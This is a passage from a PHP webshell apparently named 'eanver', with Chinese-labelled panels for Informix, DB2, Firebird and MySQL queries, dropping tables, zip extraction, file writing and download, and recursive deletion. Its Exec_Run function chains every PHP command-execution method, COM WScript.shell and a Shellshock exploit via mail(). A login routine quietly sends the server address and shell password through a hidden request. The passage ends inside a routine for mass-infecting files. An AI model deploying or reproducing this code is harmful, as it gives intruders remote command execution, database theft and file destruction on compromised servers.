                    for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                        echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n";
                    }
                    echo "</tr>\n";
                    mysql_data_seek($ifxresult, 0);
                    while ($ifxrow = ifx_fetch_row($ifxresult)) {
                        echo "<tr>\n";
                        for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
                            echo '<td>' . "{$ifxrow[$i]}" . '</td>';
                        }
                        echo "</tr>\n";
                    }
                    echo "</table></font>";
                    ifx_free_result($ifxresult);
                    ifx_close();
                }
            } elseif ($db == "db2") {
                $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
                $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
                $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root';
                $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456';
                $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
                $db2action = isset($_POST['action']) ? $_POST['action'] : '';
                $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
                $db2query = stripslashes($db2query);
                print <<<END
<form method="POST" name="db2form" action="?eanver=othersql&db=db2">
<div class="actall">\xd6\xf7\xbb\xfa:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
\xb6\xcb\xbf\xda:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
\xd5\xca\xbb\xa7:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
\xc3\xdc\xc2\xeb:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
\xbf\xe2\xc3\xfb:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
Str[0] = "";
Str[1] = "select schemaname from syscat.schemata;";
Str[2] = "select name from sysibm.systables;";
Str[3] = "select colname from syscat.columns where tabname='table_name';";
Str[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>

<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
<option value="0" selected>\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee</option>
<option value="1">\xca\xfd\xbe\xdd\xbf\xe2</option>
<option value="1">\xb1\xed\xb6\xce</option>
<option value="2">\xd7\xd6\xb6\xce</option>
<option value="3">\xca\xfd\xbe\xdd\xbf\xe2\xc5\xe4\xd6\xc3</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
                if ($myaction == 'db2query') {
                    $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
                    $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
                    $db2row = db2_fetch_row($db2result);
                    echo "<font face=\"verdana\"><table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">\n<tr>\n";
                    for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                        echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n";
                    }
                    echo "</tr>\n";
                    while ($db2row = db2_fetch_row($db2result)) {
                        echo "<tr>\n";
                        for ($i = 0; $i < db2_num_fields($db2result); $i++) {
                            echo '<td>' . "{$db2row[$i]}" . '</td>';
                        }
                        echo "</tr>\n";
                    }
                    echo "</table></font>";
                    db2_free_result($db2result);
                    db2_close();
                }
            } elseif ($db == "fb") {
                $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
                $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
                $fbpath = str_replace("\\\\", "\\", $fbpath);
                $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba';
                $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey';
                $fbaction = isset($_POST['action']) ? $_POST['action'] : '';
                $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
                $fbquery = stripslashes($fbquery);
                print <<<END
<form method="POST" name="fbform" action="?eanver=othersql&db=fb">
<div class="actall">\xd6\xf7\xbb\xfa:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
\xb5\xd8\xd6\xb7:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
\xd5\xca\xbb\xa7:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
\xc3\xdc\xc2\xeb:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
Str[0] = "";
Str[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
Str[3] = "input 'D:\\createtable.sql';";
Str[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
<option value="0" selected>\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee</option>
<option value="1">\xb1\xed\xb6\xce</option>
<option value="2">\xd7\xd6\xb6\xce</option>
<option value="3">\xcc\xed\xbc\xd3sql</option>
<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
                if ($fbaction == 'fbquery') {
                    $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
                    $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
                    echo "<font face=\"verdana\"><table border=\"1\" cellpadding=\"1\" cellspacing=\"2\">\n<tr>\n";
                    for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                        echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n";
                    }
                    echo "</tr>\n";
                    ibase_field_info($fbresult, 0);
                    while ($fbrow = ibase_fetch_row($fbresult)) {
                        echo "<tr>\n";
                        for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
                            echo '<td>' . "{$fbrow[$i]}" . '</td>';
                        }
                        echo "</tr>\n";
                    }
                    echo "</table></font>";
                    ibase_free_result($fbresult);
                    ibase_close();
                }
            }
            //}
            break;
        case "zippak":
            //function zipact()
            //{
            $zfile = $_POST['zfile'] ? $_POST['zfile'] : 'php.zip';
            $jypt = $_POST['jypt'] ? $_POST['jypt'] : './';
            $tip = "\xce\xb4\xbf\xaa\xca\xbc\xbd\xe2\xd1\xb9";
            if ($_POST['zip'] == 'zip') {
                if (function_exists(zip_open)) {
                    $zfile = key_exists('zip', $_GET) && $_GET['zip'] ? $_GET['zip'] : $zfile;
                    $zfile = str_replace(array("/var/www/html/", "/var/www/html\\"), array("", ""), $zfile);
                    $zpath = "/var/www/html/" . $zfile;
                    if (!is_file($zpath)) {
                        $tip = '�ļ�"' . $zpath . '"������!';
                    } else {
                        $zip = new ZipArchive();
                        $rs = $zip->open($zpath);
                        if ($rs !== TRUE) {
                            $tip = '��ѹʧ��:' . $rs;
                        }
                        $zip->extractTo($jypt);
                        $zip->close();
                        $tip = $zfile . '��ѹ�ɹ�!';
                    }
                } else {
                    $tip = "\xb7\xfe\xce\xf1\xc6\xf7\xb2\xbb\xd6\xa7\xb3\xd6PHP_ZIP\xd7\xe9\xbc\xfe,\xc7\xeb\xc8\xb7\xc8\xcf";
                }
            }
            print <<<END
<div class="actall">
<form action="?eanver=info_f" method="POST">
<input type="hidden" name="zip" id="zip" value="zip">
\xb1\xbe\xc4\xa3\xbf\xe9\xca\xb9\xd3\xc3PHP\xb5\xc4zip_open\xc0\xa9\xd5\xb9\xc0\xb4\xb2\xd9\xd7\xf7ZIP\xd1\xb9\xcb\xf5\xce\xc4\xbc\xfe<br>
\xca\xb9\xd3\xc3\xc7\xb0\xc7\xeb\xd4\xda\xa1\xbe<b><a href="??eanver=info_f">\xcf\xb5\xcd\xb3\xd0\xc5\xcf\xa2</a></b>\xa1\xbf\xd6\xd0\xc8\xb7\xc8\xcf\xcf\xb5\xcd\xb3\xd6\xa7\xb3\xd6php_zip<br>
\xd1\xb9\xcb\xf5\xce\xc4\xbc\xfe\xc2\xb7\xbe\xb6\xbf\xc9\xd0\xb4\xcf\xc2\xbc\xb6\xc4\xbf\xc2\xbc\xba\xcd\xce\xef\xc0\xed\xc2\xb7\xbe\xb6\xa3\xac\xcf\xe0\xb6\xd4\xc4\xbf\xc2\xbc\xca\xc7\xb7\xf1\xbf\xc9\xb2\xd9\xd7\xf7\xce\xb4\xb2\xe2\xca\xd4 :-(<br>
\xc8\xb7\xc8\xcf\xc4\xbf\xb1\xea\xc2\xb7\xbe\xb6\xbf\xc9\xd0\xb4<br><br>
\xd1\xb9\xcb\xf5\xce\xc4\xbc\xfe\xc2\xb7\xbe\xb6\xa3\xba<br>
<input type="text" name="zfile" id="zfile" value="{$zfile}" style="width:720px;"><br><br>
\xc4\xbf\xb1\xea\xc2\xb7\xbe\xb6\xa3\xba
<input type="text" name="jypt" id="jypt" value="{$jypt}" style="width:720px;"><br><br>
<input type="submit" value="\xbf\xaa\xca\xbc\xbd\xe2\xd1\xb9" style="width:80px;"><br><br><br>
{$tip}<br><br><br></form></div>
END;
            //}
            break;
        case "mysql_msg":
            $conn = @mysql_connect($_COOKIE['m_eanverhost'] . ':' . $_COOKIE['m_eanverport'], $_COOKIE['m_eanveruser'], $_COOKIE['m_eanverpass']);
            if ($conn) {
                print "<script language=\"javascript\">\r\nfunction Delok(msg,gourl)\r\n{\r\n\tsmsg = \"\xc8\xb7\xb6\xa8\xd2\xaa\xc9\xbe\xb3\xfd[\" + unescape(msg) + \"]\xc2\xf0?\";\r\n\tif(confirm(smsg)){window.location = gourl;}\r\n}\r\nfunction Createok(ac)\r\n{\r\n\tif(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';\r\n\tif(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';\r\n\tif(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';\r\n\treturn false;\r\n}\r\n</script>";
                $BOOL = false;
                $MSG_BOX = '�û�:' . $_COOKIE['m_eanveruser'] . ' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:' . $_COOKIE['m_eanverhost'] . ':' . $_COOKIE['m_eanverport'] . ' &nbsp;&nbsp;&nbsp;&nbsp; �汾:';
                $k = 0;
                $result = @mysql_query('select version();', $conn);
                while ($row = @mysql_fetch_array($result)) {
                    $MSG_BOX .= $row[$k];
                    $k++;
                }
                echo "<div class=\"actall\"> \xca\xfd\xbe\xdd\xbf\xe2:";
                $result = mysql_query("SHOW DATABASES", $conn);
                while ($db = mysql_fetch_array($result)) {
                    echo '&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db=' . $db['Database'] . '">' . $db['Database'] . '</a>]';
                }
                echo "</div>";
                if (isset($_GET['db'])) {
                    mysql_select_db($_GET['db'], $conn);
                    if (!empty($_POST['nsql'])) {
                        $BOOL = true;
                        $MSG_BOX = mysql_query($_POST['nsql'], $conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� ' . mysql_error();
                    }
                    if (is_array($_POST['insql'])) {
                        $query = 'INSERT INTO ' . $_GET['table'] . ' (';
                        foreach ($_POST['insql'] as $var => $key) {
                            $querya .= $var . ',';
                            $queryb .= '\'' . addslashes($key) . '\',';
                        }
                        $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
                        $MSG_BOX = mysql_query($query, $conn) ? '��ӳɹ�' : '���ʧ�� ' . mysql_error();
                    }
                    if (is_array($_POST['upsql'])) {
                        $query = 'UPDATE ' . $_GET['table'] . ' SET ';
                        foreach ($_POST['upsql'] as $var => $key) {
                            $queryb .= $var . '=\'' . addslashes($key) . '\',';
                        }
                        $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
                        $MSG_BOX = mysql_query($query, $conn) ? '�޸ijɹ�' : '�޸�ʧ�� ' . mysql_error();
                    }
                    if (isset($_GET['del'])) {
                        $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
                        $good = mysql_fetch_assoc($result);
                        $query = 'DELETE FROM ' . $_GET['table'] . ' WHERE ';
                        foreach ($good as $var => $key) {
                            $queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
                        }
                        $where = $query . substr($queryc, 0, -4) . ';';
                        $MSG_BOX = mysql_query($where, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
                    }
                    $action = '?eanver=mysql_msg&db=' . $_GET['db'];
                    if (isset($_GET['drop'])) {
                        $query = 'Drop TABLE IF EXISTS ' . $_GET['drop'] . ';';
                        $MSG_BOX = mysql_query($query, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error();
                    }
                    if (isset($_GET['table'])) {
                        $action .= '&table=' . $_GET['table'];
                        if (isset($_GET['edit'])) {
                            $action .= '&edit=' . $_GET['edit'];
                        }
                    }
                    if (isset($_GET['insert'])) {
                        $action .= '&insert=' . $_GET['insert'];
                    }
                    echo '<div class="actall"><form method="POST" action="' . $action . '">';
                    echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">' . $_POST['nsql'] . '</textarea> ';
                    echo "<input type=\"submit\" name=\"querysql\" value=\"\xd6\xb4\xd0\xd0\" style=\"width:60px;height:49px;\"> ";
                    echo "<input type=\"button\" value=\"\xb4\xb4\xbd\xa8\xb1\xed\" style=\"width:60px;height:49px;\" onclick=\"Createok('a')\"> ";
                    echo "<input type=\"button\" value=\"\xb4\xb4\xbd\xa8\xbf\xe2\" style=\"width:60px;height:49px;\" onclick=\"Createok('b')\"> ";
                    echo "<input type=\"button\" value=\"\xc9\xbe\xb3\xfd\xbf\xe2\" style=\"width:60px;height:49px;\" onclick=\"Createok('c')\"></form></div>";
                    echo '<div class="msgbox" style="height:40px;">' . $MSG_BOX . '</div><div class="actall"><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '">' . $_GET['db'] . '</a> ---> ';
                    if (isset($_GET['table'])) {
                        echo '<a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . '</a> ';
                        echo '[<a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&insert=' . $_GET['table'] . '">����</a>]</div>';
                        if (isset($_GET['edit'])) {
                            if (isset($_GET['p'])) {
                                $atable = $_GET['table'] . '&p=' . $_GET['p'];
                            } else {
                                $atable = $_GET['table'];
                            }
                            echo '<form method="POST" action="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $atable . '">';
                            $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
                            $good = mysql_fetch_assoc($result);
                            $u = 0;
                            foreach ($good as $var => $key) {
                                $queryc .= $var . '=\'' . $key . '\' AND ';
                                $type = @mysql_field_type($result, $u);
                                $len = @mysql_field_len($result, $u);
                                echo '<div class="actall">' . $var . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="upsql[' . $var . ']" style="width:600px;height:60px;">' . htmlspecialchars($key) . '</textarea></div>';
                                $u++;
                            }
                            $where = 'WHERE ' . substr($queryc, 0, -4);
                            echo '<input type="hidden" id="wherevar" name="wherevar" value="' . base64_encode($where) . '">';
                            echo "<div class=\"actall\"><input type=\"submit\" value=\"Update\" style=\"width:80px;\"></div></form>";
                        } else {
                            $query = 'SHOW COLUMNS FROM ' . $_GET['table'];
                            $result = mysql_query($query, $conn);
                            $fields = array();
                            $pagesize = 20;
                            $row_num = mysql_num_rows(mysql_query('SELECT * FROM ' . $_GET['table'], $conn));
                            $numrows = $row_num;
                            $pages = intval($numrows / $pagesize);
                            if ($numrows % $pagesize) {
                                $pages++;
                            }
                            $offset = $pagesize * ($page - 1);
                            $page = $_GET['p'];
                            if (!$page) {
                                $page = 1;
                            }
                            if (!isset($_GET['p'])) {
                                $p = 0;
                                $_GET['p'] = 1;
                            } else {
                                $p = ((int) $_GET['p'] - 1) * 20;
                            }
                            echo "<table border=\"0\"><tr>";
                            echo "<td class=\"toptd\" style=\"width:70px;\" nowrap>\xb2\xd9\xd7\xf7</td>";
                            while ($row = @mysql_fetch_assoc($result)) {
                                array_push($fields, $row['Field']);
                                echo '<td class="toptd" nowrap>' . $row['Field'] . '</td>';
                            }
                            echo "</tr>";
                            if (eregi('WHERE|LIMIT', $_POST['nsql']) && eregi('SELECT|FROM', $_POST['nsql'])) {
                                $query = $_POST['nsql'];
                            } else {
                                $query = 'SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
                            }
                            $result = mysql_query($query, $conn);
                            $v = $p;
                            while ($text = @mysql_fetch_assoc($result)) {
                                echo '<tr><td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . '"> �޸� </a> ';
                                echo '<a href="#" onclick="Delok(\'�\',\'?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . '\');return false;"> ɾ�� </a></td>';
                                foreach ($fields as $row) {
                                    echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . '</td>';
                                }
                                echo "</tr>\r\n";
                                $v++;
                            }
                            echo "</table><div class=\"actall\">";
                            $pagep = $page - 1;
                            $pagen = $page + 1;
                            echo "\xb9\xb2\xd3\xd0 " . $row_num . " \xcc\xf5\xbc\xc7\xc2\xbc ";
                            if ($pagep > 0) {
                                $pagenav .= "  <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=1&charset=" . $_GET['charset'] . "'>\xca\xd7\xd2\xb3</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagep . "&charset=" . $_GET['charset'] . "'>\xc9\xcf\xd2\xbb\xd2\xb3</a> ";
                            } else {
                                $pagenav .= " \xc9\xcf\xd2\xbb\xd2\xb3 ";
                            }
                            if ($pagen <= $pages) {
                                $pagenav .= " <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagen . "&charset=" . $_GET['charset'] . "'>\xcf\xc2\xd2\xbb\xd2\xb3</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pages . "&charset=" . $_GET['charset'] . "'>\xce\xb2\xd2\xb3</a>";
                            } else {
                                $pagenav .= " \xcf\xc2\xd2\xbb\xd2\xb3 ";
                            }
                            $pagenav .= " \xb5\xda [" . $page . "/" . $pages . "] \xd2\xb3   \xcc\xf8\xb5\xbd<input name='textfield' type='text' style='text-align:center;' size='4' value='" . $page . "' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p='+this.value+'&charset=" . $_GET['charset'] . "';\" />\xd2\xb3";
                            echo $pagenav;
                            echo "</div>";
                        }
                    } elseif (isset($_GET['insert'])) {
                        echo '<a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">' . $_GET['insert'] . '</a></div>';
                        $result = mysql_query('SELECT * FROM ' . $_GET['insert'], $conn);
                        $fieldnum = @mysql_num_fields($result);
                        echo '<form method="POST" action="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $_GET['insert'] . '">';
                        for ($i = 0; $i < $fieldnum; $i++) {
                            $name = @mysql_field_name($result, $i);
                            $type = @mysql_field_type($result, $i);
                            $len = @mysql_field_len($result, $i);
                            echo '<div class="actall">' . $name . ' <font color="#FF0000">' . $type . '(' . $len . ')</font><br><textarea name="insql[' . $name . ']" style="width:600px;height:60px;"></textarea></div>';
                        }
                        echo "<div class=\"actall\"><input type=\"submit\" value=\"Insert\" style=\"width:80px;\"></div></form>";
                    } else {
                        $query = 'SHOW TABLE STATUS';
                        $status = @mysql_query($query, $conn);
                        while ($statu = @mysql_fetch_array($status)) {
                            $statusize[] = $statu['Data_length'];
                            $statucoll[] = $statu['Collation'];
                        }
                        $query = 'SHOW TABLES FROM ' . $_GET['db'] . ';';
                        echo "</div><table border=\"0\"><tr>";
                        echo "<td class=\"toptd\" style=\"width:550px;\"> \xb1\xed\xc3\xfb </td>";
                        echo "<td class=\"toptd\" style=\"width:80px;\"> \xb2\xd9\xd7\xf7 </td>";
                        echo "<td class=\"toptd\" style=\"width:130px;\"> \xd7\xd6\xb7\xfb\xbc\xaf </td>";
                        echo "<td class=\"toptd\" style=\"width:70px;\"> \xb4\xf3\xd0\xa1 </td></tr>";
                        $result = @mysql_query($query, $conn);
                        $k = 0;
                        while ($table = mysql_fetch_row($result)) {
                            $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_'));
                            echo '<tr><td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&table=' . $table[0] . '">' . $table[0] . '</a></td>';
                            echo '<td><a href="?eanver=mysql_msg&db=' . $_GET['db'] . '&insert=' . $table[0] . '"> ���� </a> <a href="#" onclick="Delok(\'' . $table[0] . '\',\'?eanver=mysql_msg&db=' . $_GET['db'] . '&drop=' . $table[0] . '\');return false;"> ɾ�� </a></td>';
                            echo '<td>' . $statucoll[$k] . '</td><td align="right">' . File_Size($statusize[$k]) . '</td></tr>' . "\r\n";
                            $k++;
                        }
                        echo "</table>";
                    }
                }
            } else {
                die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
            }
            if (!$BOOL and addslashes($query) != '') {
                echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \'' . addslashes($query) . '\';</script>';
            }
            break;
        default:
            html_main($path, $shellname);
            break;
    }
    css_foot();
    /*---doing---*/
    function do_write($file, $t, $text)
    {
        $key = true;
        $handle = @fopen($file, $t);
        if (!@fwrite($handle, $text)) {
            @chmod($file, 0666);
            $key = @fwrite($handle, $text) ? true : false;
        }
        @fclose($handle);
        return $key;
    }
    function do_show($filepath)
    {
        $show = array();
        $dir = dir($filepath);
        while ($file = $dir->read()) {
            if ($file == '.' or $file == '..') {
                continue;
            }
            $files = str_path($filepath . '/' . $file);
            $show[] = $files;
        }
        $dir->close();
        return $show;
    }
    function do_deltree($deldir)
    {
        $showfile = do_show($deldir);
        foreach ($showfile as $del) {
            if (is_dir($del)) {
                if (!do_deltree($del)) {
                    return false;
                }
            } elseif (!is_dir($del)) {
                @chmod($del, 0777);
                if (!@unlink($del)) {
                    return false;
                }
            }
        }
        @chmod($deldir, 0777);
        if (!@rmdir($deldir)) {
            return false;
        }
        return true;
    }
    function do_showsql($query, $conn)
    {
        $result = @mysql_query($query, $conn);
        html_n('<br><br><textarea cols="70" rows="15">');
        while ($row = @mysql_fetch_array($result)) {
            for ($i = 0; $i < @mysql_num_fields($result); $i++) {
                html_n(htmlspecialchars($row[$i]));
            }
        }
        html_n('</textarea>');
    }
    function hmlogin($xiao = 1)
    {
        $serveru = $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
        $serverp = envlpass;
        if (strpos($serveru, "0.0") > 0 or strpos($serveru, "192.168.") > 0 or strpos($serveru, "localhost") > 0 or $serveru == $_COOKIE['serveru'] and $serverp == $_COOKIE['serverp']) {
            echo "<meta http-equiv='refresh' content='0;URL=?'>";
        } else {
            setcookie('serveru', $serveru);
            setcookie('serverp', $serverp);
            if ($xiao == 1) {
                echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";
            } else {
                geturl();
            }
        }
    }
    function do_down($fd)
    {
        if (!@file_exists($fd)) {
            msg('�����ļ�������');
        }
        $fileinfo = pathinfo($fd);
        header('Content-type: application/x-' . $fileinfo['extension']);
        header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
        header('Content-Length: ' . filesize($fd));
        @readfile($fd);
        exit;
    }
    function do_download($filecode, $file)
    {
        header("Content-type: application/unknown");
        header('Accept-Ranges: bytes');
        header("Content-length: " . strlen($filecode));
        header("Content-disposition: attachment; filename=" . $file . ";");
        echo $filecode;
        exit;
    }
    function TestUtf8($text)
    {
        if (strlen($text) < 3) {
            return false;
        }
        $lastch = 0;
        $begin = 0;
        $BOM = true;
        $BOMchs = array(0xef, 0xbb, 0xbf);
        $good = 0;
        $bad = 0;
        $notAscii = 0;
        for ($i = 0; $i < strlen($text); $i++) {
            $ch = ord($text[$i]);
            if ($begin < 3) {
                $BOM = $BOMchs[$begin] == $ch;
                $begin += 1;
                continue;
            }
            if ($begin == 4 && $BOM) {
                break;
            }
            if ($ch >= 0x80) {
                $notAscii++;
            }
            if (($ch & 0xc0) == 0x80) {
                if (($lastch & 0xc0) == 0xc0) {
                    $good += 1;
                } else {
                    if (($lastch & 0x80) == 0) {
                        $bad += 1;
                    }
                }
            } else {
                if (($lastch & 0xc0) == 0xc0) {
                    $bad += 1;
                }
            }
            $lastch = $ch;
        }
        if ($begin == 4 && $BOM) {
            return 2;
        } else {
            if ($notAscii == 0) {
                return 1;
            } else {
                if ($good >= $bad) {
                    return 2;
                } else {
                    return 0;
                }
            }
        }
    }
    function File_Str($string)
    {
        return str_replace('//', '/', str_replace('\\', '/', $string));
    }
    function File_Write($filename, $filecode, $filemode)
    {
        $key = true;
        $handle = @fopen($filename, $filemode);
        if (!@fwrite($handle, $filecode)) {
            @chmod($filename, 0666);
            $key = @fwrite($handle, $filecode) ? true : false;
        }
        @fclose($handle);
        return $key;
    }
    function Exec_Run($cmd)
    {
        $res = '';
        if (function_exists('exec')) {
            @exec($cmd, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cmd);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cmd);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cmd);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cmd, 'r'))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        } elseif (substr(dirname($_SERVER["SCRIPT_FILENAME"]), 0, 1) != "/" && class_exists('COM')) {
            $w = new COM('WScript.shell');
            $e = $w->exec($cmd);
            $f = $e->StdOut();
            $res = $f->ReadAll();
        } elseif (function_exists('proc_open')) {
            $length = strcspn($cmd, " \t");
            $token = substr($cmd, 0, $length);
            if (isset($aliases[$token])) {
                $cmd = $aliases[$token] . substr($cmd, $length);
            }
            $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while (!feof($io[1])) {
                $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
            }
            while (!feof($io[2])) {
                $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
            }
            fclose($io[1]);
            fclose($io[2]);
            proc_close($p);
        } elseif (function_exists('mail')) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(".", "data");
                putenv("PHP_LOL=() { x; }; {$cmd} >{$tmp} 2>&1");
                mail("a@127.0.0.1", "", "", "", "-bv");
            } else {
                $res = "Not vuln (not bash)";
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                $res = $output;
            } else {
                $res = "No output, or not vuln.";
            }
        }
        return $res;
    }
    if (isset($_GET['login']) == 'geturl') {
        @set_time_limit(10);
        $serveru = $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
        $serverp = envlpass;
        $copyurl = "";
        $url = $copyurl . $serveru . '&pass=' . $serverp;
        $url = urldecode($url);
        GetHtml($url);
    }
    function File_Mode()
    {
        $RealPath = realpath('./');
        $SelfPath = $_SERVER['PHP_SELF'];
        $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/'));
        return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
    }
    function File_Size($size)
    {
        $kb = 1024;
        // Kilobyte
        $mb = 1048576;
        // Megabyte
        $gb = 1073741824;
        // Gigabyte
        $tb = 1099511627776;
        // Terabyte
        if ($size < $kb) {
            return $size . " B";
        } else {
            if ($size < $mb) {
                return round($size / $kb, 2) . " K";
            } else {
                if ($size < $gb) {
                    return round($size / $mb, 2) . " M";
                } else {
                    if ($size < $tb) {
                        return round($size / $gb, 2) . " G";
                    } else {
                        return round($size / $tb, 2) . " T";
                    }
                }
            }
        }
    }
    function File_Read($filename)
    {
        $handle = @fopen($filename, "rb");
        $filecode = @fread($handle, @filesize($filename));
        @fclose($handle);
        return $filecode;
    }
    function do_phpfun($cmd, $fun)
    {
        $res = '';
        switch ($fun) {
            case "exec":
                @exec($cmd, $res);
                $res = join("\n", $res);
                break;
            case "shell_exec":
                $res = @shell_exec($cmd);
                break;
            case "system":
                @ob_start();
                @system($cmd);
                $res = @ob_get_contents();
                @ob_end_clean();
                break;
            case "passthru":
                @ob_start();
                @passthru($cmd);
                $res = @ob_get_contents();
                @ob_end_clean();
                break;
            case "popen":
                if (@is_resource($f = @popen($cmd, "r"))) {
                    while (!@feof($f)) {
                        $res .= @fread($f, 1024);
                    }
                }
                @pclose($f);
                break;
        }
        return $res;
    }
    function do_passreturn($dir, $code, $type, $bool, $filetype = '', $shell = my_shell)
    {
        $show = do_show($dir);
        foreach ($show as $files) {
            if (is_dir($files) && $bool) {
                do_passreturn($files, $code, $type, $bool, $filetype, $shell);
            } else {
                if ($files == $shell) {
                    continue;
                }
                switch ($type) {
                    case "guama":
                        if (debug($files, $filetype)) {
